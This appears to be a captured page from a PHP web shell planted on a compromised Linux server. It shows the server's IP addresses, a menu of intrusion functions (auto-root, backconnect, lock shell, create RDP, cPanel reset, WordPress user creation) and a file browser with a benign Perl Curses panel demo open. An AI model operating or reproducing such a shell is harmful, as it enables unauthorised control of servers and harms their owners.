Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.147.48.226
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Curses-1.28 /
[ HOME SHELL ]
Name
Size
Permission
Action
Artistic
5.97
KB
-rw-r--r--
Copying
12.22
KB
-rw-r--r--
README
4.75
KB
-rw-r--r--
demo
1.65
KB
-rw-r--r--
demo.form
5.12
KB
-rw-r--r--
demo.menu
2.28
KB
-rw-r--r--
demo.panel
1.48
KB
-rw-r--r--
demo2
1.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : demo.panel
#! /usr/bin/perl ## ## This code contributed by Chris Leach <leachcj@bp.com> use ExtUtils::testlib; use Curses; eval { new_panel() }; if ($@ =~ /not defined by your vendor/) { print STDERR "Curses was not compiled with panel function.\n"; exit 1; } my $p1 = mkpanel("000"); message("New Panel with 000's"); my $p2 = mkpanel("+++"); move_panel($p1, 8, 20); message("New Panel with +++'s"); hide_panel($p1); message("Hiding 000's"); message("000's hidden? ", panel_hidden($p1) ? "Yes" : "No"); show_panel($p1); message("Showing 000's"); my $p3 = mkpanel("XXX"); move_panel($p3, 7, 34); message("New Panel with XXX's"); top_panel(panel_above(panel_above(undef))); message("Moving the panel above the bottom panel to the top"); bottom_panel(panel_below(panel_below(undef))); message("Moving the panel below the top panel to the bottom"); my $w3 = panel_window($p3); del_panel($p3); message("Deleting panel with XXX's saving window"); replace_panel($p1, $w3); message("Replacing 000's window"); del_panel($p2); del_panel($p1); endwin(); sub mkpanel { my $s = shift; my $w = Curses->new(10, 26, 12, 25); die unless $w; box($w, 0, 0); my $p = new_panel($w); if ($p) { set_panel_userptr($p, $s); foreach my $r (1..8) { addstr($w, $r, 3*$r-2, $s); } } else { fatal("new_panel failed"); } $p; } sub message { addstr(stdscr, 0, 0, "@_\n"); update_panels(); doupdate(); sleep 2; } sub fatal { message("@_"); exit 1; }
Close